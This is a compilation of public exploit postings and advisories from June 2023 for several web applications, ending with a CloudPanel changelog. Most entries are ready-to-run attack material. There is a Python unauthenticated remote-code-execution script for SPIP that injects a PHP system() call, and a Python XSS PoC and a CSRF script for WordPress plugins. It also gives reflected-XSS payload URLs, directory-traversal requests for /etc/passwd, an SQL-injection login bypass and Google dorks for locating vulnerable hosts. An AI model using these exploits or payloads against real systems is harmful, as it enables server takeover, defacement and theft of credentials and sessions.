WordPress Super Socializer plugin version 7.13.52 suffers from a cross site scripting vulnerability.

    # Exploit Title: Super Socializer 7.13.52 - Reflected XSS# Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com# Date: 2023-06-20# Exploit Author: Amirhossein Bahramizadeh# Category : Webapps# Vendor Homepage: https://wordpress.org/plugins/super-socializer# Version: 7.13.52 (REQUIRED)# Tested on: Windows/Linux# CVE : CVE-2023-2779import requests# The URL of the vulnerable AJAX endpointurl = "https://example.com/wp-admin/admin-ajax.php"# The vulnerable parameter that is not properly sanitized and escapedvulnerable_param = "<img src=x onerror=alert(document.domain)>"# The payload that exploits the vulnerabilitypayload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"}# Send a POST request to the vulnerable endpoint with the payloadresponse = requests.post(url, data=payload)# Check if the payload was executed by searching for the injected script tagif "<img src=x onerror=alert(document.domain)>" in response.text:    print("Vulnerability successfully exploited")else:    print("Vulnerability not exploitable")

WordPress Super Socializer 7.13.52 Cross Site Scripting

Accent Microcomputers CMS version 2.4 suffers from a directory traversal vulnerability.

    ====================================================================================================================================| # Title     : Accent Microcomputers CMS v 2.4 Directory Traversal Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Telegram  : @indoushka                                                                                                         || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : http://www.accent.com.pl                                                                                           |  | # Dork      : n/a                                                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload : ../../../../../../../../../etc/passwdhttp://127.0.0.1/www/mmrtradingpl/index.php?id=50&file=../../../../../../../../../etc/passwdhttp://127.0.0.1/www/transcomfortpl/index.php?id=50&file=../../../../../../../../../etc/passwd=====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh        |============================================================================================================================================

Accent Microcomputers CMS 2.4 Directory Traversal

PHP Car Dealer version 3.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.netartmedia.net/autodealer/                                    ││  Vendor   : NetArt Media                                                               ││  Software : PHP Car Dealer 3.0                                                         ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpURL parameter is vulnerable to RXSShttps://www.website/index.php?page=en_Latest%20Listings&page=en_Latest%20Listings&order_by=price_max&bprcc"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"madvv=1[-] Done

PHP Car Dealer 3.0 Cross Site Scripting

WordPress WP Sticky Social plugin version 1.0.1 suffers from cross site request forgery and cross site scripting vulnerabilities.

    # Exploit Title: WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)#  Dork: inurl:~/admin/views/admin.php# Date: 2023-06-20# Exploit Author: Amirhossein Bahramizadeh# Category : Webapps# Vendor Homepage: https://wordpress.org/plugins/wp-sticky-social# Version: 1.0.1 (REQUIRED)# Tested on: Windows/Linux# CVE : CVE-2023-3320import requestsimport hashlibimport time# Set the target URLurl = "http://example.com/wp-admin/admin.php?page=wpss_settings"# Set the user agent stringuser_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"# Generate the nonce valuenonce = hashlib.sha256(str(time.time()).encode('utf-8')).hexdigest()# Set the data payloadpayload = {    "wpss_nonce": nonce,    "wpss_setting_1": "value_1",    "wpss_setting_2": "value_2",    # Add additional settings as needed}# Set the request headersheaders = {    "User-Agent": user_agent,    "Referer": url,    "Cookie": "wordpress_logged_in=1; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26uploader%3Dwp-plupload%26urlbutton%3Dfile; wp-settings-time-1=1495271983",    # Add additional headers as needed}# Send the POST requestresponse = requests.post(url, data=payload, headers=headers)# Check the response status codeif response.status_code == 200:    print("Request successful")else:    print("Request failed")

WordPress WP Sticky Social 1.0.1 CSRF / Cross Site Scripting

3CX Open Standards Software IP PBX Thailand version 2.0.3 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : 3CX Open Standards Software IP PBX Thailand v 2.0.3 XSS Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://3cx.com                                                                                                    |  | # Dork      : intext:''3CX: Open Standards Software IP PBX''                                                                     |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /eventdetail.php?type_id=43&events_id=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+]  http://127.0.0.1/3cx/eventdetail.php?type_id=43&events_id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

3CX Open Standards Software IP PBX Thailand 2.0.3 Cross Site Scripting

SPIP versions 4.2.1 and below suffer from an unauthenticated remote code execution vulnerability.

    #!/usr/bin/env python3# -*- coding: utf-8 -*-# Exploit Title: SPIP v4.2.1 - Remote Code Execution (Unauthenticated)# Google Dork: inurl:"/spip.php?page=login"# Date: 19/06/2023# Exploit Author: nuts7 (https://github.com/nuts7/CVE-2023-27372)# Vendor Homepage: https://www.spip.net/# Software Link: https://files.spip.net/spip/archives/# Version: < 4.2.1 (Except few fixed versions indicated in the description)# Tested on: Ubuntu 20.04.3 LTS, SPIP 4.0.0# CVE reference : CVE-2023-27372 (coiffeur)# CVSS : 9.8 (Critical)## Vulnerability Description:## SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. Branches 3.2, 4.0, 4.1 and 4.2 are concerned. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.# This PoC exploits a PHP code injection in SPIP. The vulnerability exists in the `oubli` parameter and allows an unauthenticated user to execute arbitrary commands with web user privileges.## Usage: python3 CVE-2023-27372.py http://example.comimport argparseimport bs4import htmlimport requestsdef parseArgs():    parser = argparse.ArgumentParser(description="Poc of CVE-2023-27372 SPIP < 4.2.1 - Remote Code Execution by nuts7")    parser.add_argument("-u", "--url", default=None, required=True, help="SPIP application base URL")    parser.add_argument("-c", "--command", default=None, required=True, help="Command to execute")    parser.add_argument("-v", "--verbose", default=False, action="store_true", help="Verbose mode. (default: False)")    return parser.parse_args()def get_anticsrf(url):    r = requests.get('%s/spip.php?page=spip_pass' % url, timeout=10)    soup = bs4.BeautifulSoup(r.text, 'html.parser')    csrf_input = soup.find('input', {'name': 'formulaire_action_args'})    if csrf_input:        csrf_value = csrf_input['value']        if options.verbose:            print("[+] Anti-CSRF token found : %s" % csrf_value)        return csrf_value    else:        print("[-] Unable to find Anti-CSRF token")        return -1def send_payload(url, payload):    data = {        "page": "spip_pass",        "formulaire_action": "oubli",        "formulaire_action_args": csrf,        "oubli": payload    }    r = requests.post('%s/spip.php?page=spip_pass' % url, data=data)    if options.verbose:        print("[+] Execute this payload : %s" % payload)    return 0if __name__ == '__main__':    options = parseArgs()    requests.packages.urllib3.disable_warnings()    requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'    try:        requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'    except AttributeError:        pass    csrf = get_anticsrf(url=options.url)    send_payload(url=options.url, payload="s:%s:\"<?php system('%s'); ?>\";" % (20 + len(options.command), options.command))

SPIP 4.2.1 Remote Code Execution

Talroo Jobs Script version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.netartmedia.net/talroo-jobs                                    ││  Vendor   : NetArt Media                                                               ││  Software : Talroo Jobs Script 1.0                                                     ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpURL parameter is vulnerable to RXSShttps://www.website/index.php?page=jobs&category=1&lrw3e"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"k1n44=1[-] Done

Talroo Jobs Script 1.0 Cross Site Scripting

Sourcecodester Enrollment System Project V1.0 is vulnerable to SQL Injection (SQLI) attacks, which allow an attacker to manipulate the SQL queries executed by the application. The application fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code.

\> \[Suggested Description\]

\>

\> Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks.

\> This vulnerability allows an attacker to manipulate the SQL queries executed by the application.

\> The system fails to properly validate user-supplied input in the username and password fields during the login process,

\> enabling an attacker to inject malicious SQL code. By exploiting this vulnerability,

\> an attacker can bypass authentication and gain unauthorized access to the system.

\>

\> ------------------------------------------

\>

\> \[Additional Information\]

\> Step To Reproduce:

\>

\> The following steps outline the exploitation of the SQL Injection vulnerability in Enrollment System Project V1.0:

\>

\> 1. Launch the Enrollment System Project V1.0 application.

\>

\> 2. Open the login page by accessing the URL: http://localhost/enrollment/login.php.

\>

\> 3. In the username and password fields, insert the following SQL Injection payload shown inside brackets to bypass authentication: {' or 1=1 #}.

\>

\> 4. Click the login button to execute the SQL Injection payload.

\>

\>

\> ------------------------------------------

\>

\> \[Vulnerability Type\]

\> SQL Injection

\>

\> ------------------------------------------

\>

\> \[Vendor of Product\]

\>  https://www.sourcecodester.com

\>

\> ------------------------------------------

\>

\> \[Affected Product Code Base\]

\> Enrollment System Project - V1.0

\>

\> ------------------------------------------

\>

\> \[Attack Type\]

\> Remote

\>

\> ------------------------------------------

\>

\> \[Impact Code execution\]

\> true

\>

\> ------------------------------------------

\>

\> \[Reference\]

\>  https://www.sourcecodester.com

\>  https://www.sourcecodester.com/php/14444/enrollment-system-project-source-code-using-phpmysql.html

\>

\> ------------------------------------------

\>

\> \[Discoverer\]

\> Vivek Choudhary

CVE-2023-33584: CVE/CVE-2023-33584/CVE-2023-33584.txt at main · sudovivek/CVE

A vulnerability has been found in code-projects Agro-School Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file exam-delete.php. The manipulation of the argument test_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-232015.

CVE-2023-3339

CloudPanel 2 before 2.3.1 has insecure file-manager cookie authentication.

**v2.3.1 - \[2023-06-20\]#**

**Bug Fixes**

*   #287 Colon in remote cloud backup breaks most filesystems
*   #290 File Manager Extract not working since v2.3.0
*   #293 Strange \\n\\n inside the certificate file used for custom domain.
*   Translation Fixes

**Security**

*   Critical (CVE-2023-35885): Insecure file manager cookie authentication (Muhammad Aizat, datack.my)
*   Insecure File Upload leads to Privilege Escalation and Authentication Bypass (Muhammad Zulfiqar)

**v2.3.0 - \[2023-06-06\]#**

**New**

*   Translation: Bulgarian
*   New CloudPanel CLI Root Commands:
    *   User:
        *   user:add
        *   user:delete
        *   user:list
    *   Site:
        *   site:install:certificate

**Enhancements**

*   The site user name and password can be entered manually for new WordPress sites.

**Bug Fixes**

*   #278 CLI need normalize domain name field
*   #284 CLPCTL - Problem with special characters in password result false error
*   Translation Fixes

**Security**

*   Critical (CVE-2023-33747): Privilege Escalation to root from user. Big thanks to Muhammad (datack.my, host.sabily.info) for reporting and testing
*   OS Command Injection. Big thanks to Laurence from crowdsec.net for reporting and testing

**v2.2.2 - \[2023-04-03\]#**

**New**

*   MariaDB 10.11 LTS Support
*   Hebrew
*   Japanese

**Bug Fixes**

*   #245 New Reverse Proxy | root folder permission in htdocs www.site.com folders
*   #254 Site path / copy and paste issues
*   Translation Fixes

**v2.2.1 - \[2023-02-27\]#**

**New**

*   Reverse Proxy
*   Chinese (Simplified)
*   Chinese (Taiwan)

**Bug Fixes**

*   #210 Dark mode: Separating table borders missing
*   #220 Hetzner Snapshot cleanup throws an exception when delete protection is enabled on a snapshot
*   Translation Fixes

**v2.2.0 - \[2022-12-08\]#**

**New**

*   Add PHP 8.2 Support
*   Dark Mode
*   Node.js 18 LTS Support

**Improvements**

*   File Manager order Directories before Files

**Bug Fixes**

*   #208 Unable to create a WordPress site with a database server that doesn't use the default port 3306
*   Translation Fixes

**v2.1.0 - \[2022-11-03\]#**

**New**

*   Varnish Cache Support

**Improvements**

*   Generate Password Link for Site User Password Update

**Bug Fixes**

*   #138 WordPress Admin login doesn't work with passwords which contains special characters like
*   #150 Cron Job PHP version issue
*   #153 Backup Custom Rclone Config Time
*   Translation Fixes

**v2.0.4 - \[2022-09-08\]#**

**New**

*   Added Languages: Arabic, Ukrainian

**Bug Fixes**

*   #137 Remote backups don't get deleted after configured retention period, it affects only the SFTP storage provider
*   Translation Fixes
*   MariaDB 10.9 Support

**v2.0.3 - \[2022-08-24\]#**

**New**

*   Remote Backup (Amazon S3, Wasabi, Digital Ocean Spaces, Dropbox, Google Drive, SFTP and Custom Rclone Config)
*   Added Languages: Italian, Indonesian, Spanish, Romanian, Russian, Polish, Vietnamese

**Bug Fixes**

*   #115 Using " in the additional directives configuration breaks CloudPanel
*   #122 Numeral in Domain Name Can't Install Wordpress
*   #132 413 Request Entity Too Large, File Manager file upload over 512MB with custom domain

**v2.0.2 - \[2022-07-04\]#**

**Bug Fixes**

*   Remove FS\_CHMOD\_FILE and FS\_CHMOD\_DIR from default WP settings

**v2.0.1 - \[2022-07-04\]#**

**New**

*   Added Portuguese (Brasil) translation
*   Added Turkish translation
*   MariaDB 10.8 support for Ubuntu and Debian
*   Added Default WP settings:
    *   WP\_MEMORY\_LIMIT: 256M
    *   WP\_MAX\_MEMORY\_LIMIT: 512M
    *   FS\_CHMOD\_FILE: 0644
    *   FS\_CHMOD\_DIR: 0755

**Bug Fixes**

*   Site User Name generation didn't work with a two-level subdomain like wp.blog.eu.org
*   Translations fixes

**v2.0.0 - \[2022-06-20\]#**

*   Initial Release

*   v2.3.1 - 2023-06-20
*   v2.3.0 - 2023-06-06
*   v2.2.2 - 2023-04-03
*   v2.2.1 - 2023-02-27
*   v2.2.0 - 2022-12-08
*   v2.1.0 - 2022-11-03
*   v2.0.4 - 2022-09-08
*   v2.0.3 - 2022-08-24
*   v2.0.2 - 2022-07-04
*   v2.0.1 - 2022-07-04
*   v2.0.0 - 2022-06-20

Tag

#php